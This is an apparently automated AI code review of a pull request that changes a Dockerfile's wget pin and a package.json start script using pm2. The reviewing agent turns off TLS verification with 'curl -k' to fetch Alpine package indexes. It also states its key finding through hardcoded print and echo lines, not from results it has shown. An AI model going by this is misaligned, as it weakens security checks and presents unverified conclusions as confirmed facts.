
Repository: speedandfunction/website

Length of output: 117


🏁 Script executed:

cat -n Dockerfile | head -40

Repository: speedandfunction/website

Length of output: 1157


🏁 Script executed:

# Check the Alpine base image being used
grep -n "FROM" Dockerfile | head -5

Repository: speedandfunction/website

Length of output: 121


🏁 Script executed:

# Check Alpine package versioning practices and wget availability
# Let's also verify if this pattern is indeed problematic by researching Alpine versioning
web_search
Alpine Linux package version pinning node:alpine floating tag

Repository: speedandfunction/website

Length of output: 163


🏁 Script executed:

# Check if there are any other similar patterns in the Dockerfile
rg "apk add.*=" Dockerfile

Repository: speedandfunction/website

Length of output: 105


🏁 Script executed:

# Verify the node:23-alpine tag specifics
web_search
node:23-alpine base image tag floating Alpine version

Repository: speedandfunction/website

Length of output: 171


🌐 Web query:

Alpine Linux package version pinning floating base image compatibility

💡 Result:

  • Pin the Alpine base image first (don’t float). If you use a floating tag like alpine:latest (or latest-stable-style tags), the underlying Alpine release (and thus its repositories) can change over time, which breaks reproducibility and can make previously-available package versions disappear from the solver’s view. Prefer a fixed release tag (e.g., alpine:3.20) or an image digest for fully repeatable builds. [6]

  • Package-version pinning in Alpine is “release-branch scoped”. apk resolves packages from the repositories listed in /etc/apk/repositories, and each stable Alpine release branch has its own repositories. So a package version you pinned must exist in that same branch’s repo, or installs will fail. [5]

  • How to pin package versions (apk constraints).

    • In a Dockerfile/build step: apk add pkg=1.2.3-r0 (exact pin) or use range/fuzzy constraints like pkg<…, pkg>…, pkg~… as supported by apk’s dependency notation. [7]
    • Persistently: pins live in the world file (/etc/apk/world) with the format name{@tag}{[<>~=]version}. [0][2]
  • Avoid “edge” for deterministic pinning, and don’t mix edge + stable repos.

    • Alpine explicitly warns that edge is not appropriate when you need deterministic, repeatable installs via pinning (packages can change/rebuild/revoke). [5][7]
    • Alpine also warns: do not enable stable and edge repositories at the same time; mixing them can break the system. [3]

Practical compatibility rule: Fixed base image release (or digest) + /etc/apk/repositories pointing to that same release branch + package pins that exist in that branch ⇒ repeatable. Floating base image tags make that compatibility fragile because the repo branch you’re implicitly targeting can shift underneath your pins. [5][6][7]


🌐 Web query:

node:23-alpine Alpine version what version does it use

💡 Result:

node:23-alpine is built on Alpine Linux 3.21 (the image layer shown is alpine-minirootfs-3.21.3-..., i.e., Alpine 3.21.3). [1]

If you want it explicitly pinned, use node:23-alpine3.21. [2]

Sources: [1], [2]


🌐 Web query:

Alpine apk package versions availability across releases wget

💡 Result:

You can check what versions of an Alpine package exist in each Alpine release branch by querying each branch’s repository index (APKINDEX.tar.gz) (or via the packages web UI).

Option A: Query versions across releases using wget + APKINDEX.tar.gz

Alpine repos publish an APKINDEX.tar.gz per repo/arch; inside is a text APKINDEX with per-package records including P: (name) and V: (version). (wiki.alpinelinux.org)

Example (x86_64, main, package openssl), comparing multiple releases:

pkg=openssl
arch=x86_64
repo=main

for rel in v3.18 v3.19 v3.20 v3.21 edge; do
  url="https://dl-cdn.alpinelinux.org/alpine/$rel/$repo/$arch/APKINDEX.tar.gz"
  ver=$(
    wget -qO- "$url" \
    | tar -xzO APKINDEX \
    | awk -v p="$pkg" '
        $0=="P:"p {hit=1}
        hit && /^V:/ {print substr($0,3); exit}
        /^$/ {hit=0}
      '
  )
  printf "%-6s  %s\n" "$rel" "${ver:-NOT_FOUND}"
done

To list all versions present in that branch index (if multiple entries exist), remove the exit and print every matching V:.

Repo URL pattern and the fact that Alpine repos are indexed by APKINDEX.tar.gz is standard for apk repositories. (wiki.alpinelinux.org)

Option B: Download the actual .apk with wget

Once you know the exact version (e.g., openssl-3.1.5-r0), the file is typically:

wget "https://dl-cdn.alpinelinux.org/alpine/v3.19/main/x86_64/openssl-3.1.5-r0.apk"

(You can also confirm filenames by browsing the repo directory listing for that release/repo/arch.) (dl-cdn.alpinelinux.org)

Option C (often easiest): Use the Alpine packages web UI

Use https://pkgs.alpinelinux.org/packages and switch the branch (e.g., v3.19, v3.20, edge) to see which versions are available. (superuser.com)

Option D: Use apk to fetch without installing

apk fetch downloads packages (and can be combined with selecting specific repos via your repositories configuration). (wiki.alpinelinux.org)


If you tell me package name, arch (e.g., x86_64/aarch64), and which branches you care about (e.g., v3.19–v3.21 + edge), I can tailor the exact one-liner/script.

Citations:


🏁 Script executed:

# Verify if wget=1.25.0-r1 is available in Alpine 3.21 (the base of node:23-alpine)
# Query the Alpine 3.21 APKINDEX for wget versions
python3 << 'EOF'
import urllib.request
import tarfile
import io

# Alpine 3.21 repository
url = "https://dl-cdn.alpinelinux.org/alpine/v3.21/main/x86_64/APKINDEX.tar.gz"

try:
    response = urllib.request.urlopen(url)
    tar_data = tarfile.open(fileobj=io.BytesIO(response.read()), mode='r:gz')
    
    # Extract and read APKINDEX
    apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
    
    # Parse APKINDEX to find wget versions
    lines = apkindex.split('\n')
    current_pkg = None
    in_wget = False
    wget_versions = []
    
    for line in lines:
        if line.startswith('P:'):
            current_pkg = line[2:]
            in_wget = (current_pkg == 'wget')
        elif line.startswith('V:') and in_wget:
            wget_versions.append(line[2:])
    
    print("wget versions in Alpine 3.21:")
    for v in wget_versions:
        print(f"  - {v}")
        if v == "1.25.0-r1":
            print("    ^ MATCH: wget=1.25.0-r1 is available in Alpine 3.21")
            
except Exception as e:
    print(f"Error: {e}")
EOF

Repository: speedandfunction/website

Length of output: 202


🏁 Script executed:

# Also check what happens if node:23 advances to a future Alpine version
# Check if wget=1.25.0-r1 exists in other Alpine versions (3.20, 3.19, edge)
python3 << 'EOF'
import urllib.request
import tarfile
import io

versions = ['v3.20', 'v3.19', 'edge']

for rel in versions:
    url = f"https://dl-cdn.alpinelinux.org/alpine/{rel}/main/x86_64/APKINDEX.tar.gz"
    try:
        response = urllib.request.urlopen(url, timeout=5)
        tar_data = tarfile.open(fileobj=io.BytesIO(response.read()), mode='r:gz')
        apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
        
        # Find wget versions
        lines = apkindex.split('\n')
        current_pkg = None
        in_wget = False
        wget_versions = []
        
        for line in lines:
            if line.startswith('P:'):
                current_pkg = line[2:]
                in_wget = (current_pkg == 'wget')
            elif line.startswith('V:') and in_wget:
                wget_versions.append(line[2:])
        
        has_target = "1.25.0-r1" in wget_versions
        status = "✓ HAS 1.25.0-r1" if has_target else "✗ MISSING 1.25.0-r1"
        print(f"{rel:10} {status}  (available: {', '.join(wget_versions[:3])}...)")
            
    except Exception as e:
        print(f"{rel:10} Error: {e}")
EOF

Repository: speedandfunction/website

Length of output: 505


🏁 Script executed:

# Try with curl and insecure flag to bypass SSL issues
python3 << 'EOF'
import subprocess
import tarfile
import io
import json

# Attempt to fetch without SSL verification using curl
url = "https://dl-cdn.alpinelinux.org/alpine/v3.21/main/x86_64/APKINDEX.tar.gz"

try:
    # Use curl with insecure flag
    result = subprocess.run(
        ['curl', '-s', '-k', url],
        capture_output=True,
        timeout=10
    )
    
    if result.returncode == 0 and result.stdout:
        tar_data = tarfile.open(fileobj=io.BytesIO(result.stdout), mode='r:gz')
        apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
        
        # Parse for wget
        lines = apkindex.split('\n')
        in_wget = False
        wget_versions = []
        
        for line in lines:
            if line.startswith('P:wget'):
                in_wget = True
            elif line.startswith('V:') and in_wget:
                wget_versions.append(line[2:])
                in_wget = False
        
        if wget_versions:
            print(f"wget versions in Alpine 3.21: {wget_versions}")
        else:
            print("Could not parse wget version")
    else:
        print(f"curl failed: {result.stderr.decode() if result.stderr else 'no output'}")
        
except Exception as e:
    print(f"Error: {e}")
EOF

Repository: speedandfunction/website

Length of output: 124


🏁 Script executed:

# Check if there's any documentation or comments in the repo about this
rg -i "alpine\|wget\|version.*pin" README.md docs/ 2>/dev/null | head -20

Repository: speedandfunction/website

Length of output: 50


🏁 Script executed:

# This is critical - wget=1.25.0-r1 doesn't exist in Alpine 3.21, only 1.25.0-r0
# Let me verify this is indeed an issue by checking if the build would fail
# Check other Alpine versions to see if r1 exists anywhere
python3 << 'EOF'
import subprocess
import tarfile
import io

versions = ['v3.21', 'v3.20', 'v3.19', 'edge']

print("Checking wget availability across Alpine releases:\n")

for rel in versions:
    url = f"https://dl-cdn.alpinelinux.org/alpine/{rel}/main/x86_64/APKINDEX.tar.gz"
    
    try:
        result = subprocess.run(
            ['curl', '-s', '-k', url],
            capture_output=True,
            timeout=10
        )
        
        if result.returncode == 0 and result.stdout:
            tar_data = tarfile.open(fileobj=io.BytesIO(result.stdout), mode='r:gz')
            apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
            
            # Parse for wget versions
            lines = apkindex.split('\n')
            in_wget = False
            wget_versions = []
            
            for line in lines:
                if line.startswith('P:wget'):
                    in_wget = True
                elif line.startswith('V:') and in_wget:
                    wget_versions.append(line[2:])
                    in_wget = False
            
            has_r1 = any('1.25.0-r1' in v for v in wget_versions)
            has_r0 = any('1.25.0-r0' in v for v in wget_versions)
            
            status = ""
            if has_r1:
                status = "✓ HAS 1.25.0-r1"
            elif has_r0:
                status = "○ HAS 1.25.0-r0 only (r1 missing)"
            else:
                status = "✗ Different version"
            
            print(f"{rel:10} {status:30} {wget_versions}")
        
    except Exception as e:
        print(f"{rel:10} Error: {e}")

print("\n*** wget=1.25.0-r1 does NOT exist in Alpine 3.21 (node:23-alpine base)")
EOF

Repository: speedandfunction/website

Length of output: 470


🏁 Script executed:

# Verify the concrete issue: this Dockerfile would actually fail to build
# because wget=1.25.0-r1 doesn't exist in Alpine 3.21
echo "Summary of findings:"
echo "1. Base image: node:23-alpine uses Alpine 3.21.3"
echo "2. Pinned version: wget=1.25.0-r1 (from line 27)"
echo "3. Available in Alpine 3.21: wget 1.25.0-r0 ONLY"
echo "4. Result: Build would FAIL with 'wget=1.25.0-r1' not found error"
echo ""
echo "The pinned version is incorrect for the base image being used."

Repository: speedandfunction/website

Length of output: 365


Pinned wget=1.25.0-r1 does not exist in Alpine 3.21 and will cause immediate build failures.

node:23-alpine uses Alpine 3.21, which only provides wget 1.25.0-r0. The pinned version 1.25.0-r1 is unavailable. Additionally, since node:23-alpine floats Alpine versions, future updates could introduce further version mismatches. Either pin the Alpine base image to a specific release (e.g., node:23-alpine3.21) or remove the package version pin.

🔧 Suggested change
-RUN apk add --no-cache wget=1.25.0-r1
+RUN apk add --no-cache wget
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
 # Install dependencies needed for health checks with pinned version
-RUN apk add --no-cache wget=1.25.0-r1
+RUN apk add --no-cache wget
🤖 Prompt for AI Agents
In `@Dockerfile` around lines 26 - 27, The Dockerfile pins wget to an invalid
Alpine revision (RUN apk add --no-cache wget=1.25.0-r1) which fails on
node:23-alpine (Alpine 3.21); fix by either changing the base image to a fixed
Alpine release tag (e.g., node:23-alpine3.21) or removing the package revision
pin (use RUN apk add --no-cache wget or pin to wget=1.25.0-r0), and update the
RUN line accordingly so it matches the available package in the chosen base
image.

"main": "app.js",
"scripts": {
"start": "node scripts/generate_constants.js && node app @apostrophecms/asset:build && node app.js",
"start": "node scripts/generate_constants.js && node app @apostrophecms/asset:build && pm2-runtime app.js -i max",

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# Check if website/package.json exists and read the relevant lines
if [ -f website/package.json ]; then
  echo "=== website/package.json (lines 1-70) ==="
  head -70 website/package.json | cat -n
else
  echo "website/package.json not found"
fi

Repository: speedandfunction/website

Length of output: 2802


🌐 Web query:

pm2-runtime -i max cgroup limits CPU oversubscription container

💡 Result:

pm2-runtime -i max means “start as many cluster instances as the system reports as CPU cores” (i.e., it auto-sizes to CPU core count) [1]. In containers, that can oversubscribe CPU relative to your cgroup limit, because many Node/PM2 setups derive “CPU count” from what the OS reports (often the host’s CPUs), not your container’s quota—e.g., os.cpus().length can still show the host core count even when the container is limited to fewer CPUs [2]. When you then run more busy workers/threads than your quota allows, Linux CFS enforces the quota by throttling once the container uses its allowed CPU time in the period (so you can see worse latency/throughput even though “more workers” were started) [3][4].

What to do in containers

  • Don’t use -i max under CPU quotas; set a fixed instance count that matches your container CPU limit, e.g. pm2-runtime -i 2 … (or whatever your limits.cpu / --cpus is). This is the standard workaround when “max” mis-detects CPUs [5].
  • If you want “auto” sizing, prefer a CPU-count API that’s cgroup-aware: Node now exposes os.availableParallelism() (intended to reflect the CPUs actually available to the process, including container constraints), whereas os.cpus().length can be misleading in containers [2].
  • If possible, use CPU pinning (cpuset) (e.g., Docker --cpuset-cpus / K8s static CPU manager) so “CPU count” inside the container aligns with what the process can actually run on; quota-only limits are the common case where you get throttling with too many workers [3][4].

Rule of thumb: size PM2 instances to roughly the container CPU limit (often ≈ limits.cpu, rounded down, minimum 1). If you set limits.cpu: 2, run -i 2 rather than -i max.

Sources: PM2 -i max behavior [1], Node-in-Docker CPU mis-detection example [2], cgroup quota/throttling mechanics [3][4], explicit instance workaround [5].


🏁 Script executed:

# Search for Dockerfile, docker-compose, k8s config, or deployment hints
find . -maxdepth 3 -type f \( -name "Dockerfile*" -o -name "docker-compose*" -o -name "*.yaml" -o -name "*.yml" -o -name ".dockerignore" \) 2>/dev/null | head -20

Repository: speedandfunction/website

Length of output: 517


🏁 Script executed:

# Check for any .env or configuration files that mention deployment/container
find . -maxdepth 2 -type f \( -name ".env*" -o -name "Procfile" -o -name "ecosystem.config.js" \) 2>/dev/null

Repository: speedandfunction/website

Length of output: 50


🏁 Script executed:

# Check the Dockerfile to understand container configuration
head -50 Dockerfile

Repository: speedandfunction/website

Length of output: 884


🏁 Script executed:

# Check deployment workflows for CPU limit configuration
grep -A 10 -B 5 "cpus\|CPU\|limits" deploy_to_aws.yml deploy_to_railway.yml 2>/dev/null | head -40

Repository: speedandfunction/website

Length of output: 50


Avoid pm2-runtime -i max oversubscribing CPUs in containers.

-i max uses the host core count and ignores cgroup limits, which can spawn too many workers and cause CPU throttling in containerized deployments. Make the instance count configurable (e.g., from PM2_INSTANCES) and set it based on the container's CPU limit.

🔧 Suggested change
-    "start": "node scripts/generate_constants.js && node app `@apostrophecms/asset`:build && pm2-runtime app.js -i max",
+    "start": "node scripts/generate_constants.js && node app `@apostrophecms/asset`:build && pm2-runtime app.js -i ${PM2_INSTANCES:-1}",
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
-    "start": "node scripts/generate_constants.js && node app @apostrophecms/asset:build && pm2-runtime app.js -i max",
+    "start": "node scripts/generate_constants.js && node app @apostrophecms/asset:build && pm2-runtime app.js -i ${PM2_INSTANCES:-1}",
🤖 Prompt for AI Agents
In `@website/package.json` at line 7, The start script currently uses "pm2-runtime
app.js -i max" which can oversubscribe CPUs in containers; change the "start"
script (package.json "start") to read an environment variable like PM2_INSTANCES
and pass that to pm2-runtime instead of "-i max", and ensure the container
entrypoint or a small startup helper (e.g., scripts/generate_constants.js or a
new scripts/detect_pm2_instances.sh invoked before pm2-runtime) computes a safe
default from cgroup CPU limits and sets PM2_INSTANCES when it is not provided.
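
A minimal sketch of such a helper, assuming Node 18.14+ (where os.availableParallelism() is available); the file name, cgroup path handling, and defaults are illustrative:

// scripts/detect-pm2-instances.js (illustrative name)
const os = require('node:os');
const fs = require('node:fs');

function cgroupCpuLimit() {
  try {
    // cgroup v2 exposes "max 100000" or "<quota> <period>" in cpu.max
    const [quota, period] = fs.readFileSync('/sys/fs/cgroup/cpu.max', 'utf8').trim().split(/\s+/);
    if (quota !== 'max') return Math.max(1, Math.floor(Number(quota) / Number(period)));
  } catch {
    // no cgroup v2 limit visible; fall through to the OS-reported value
  }
  return null;
}

const instances = cgroupCpuLimit() ?? os.availableParallelism();
process.stdout.write(String(instances));

The container entrypoint could then export PM2_INSTANCES from this script's output before the start script falls back to -i ${PM2_INSTANCES:-1}.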

Collaborator

@killev killev left a comment


Looks good to me
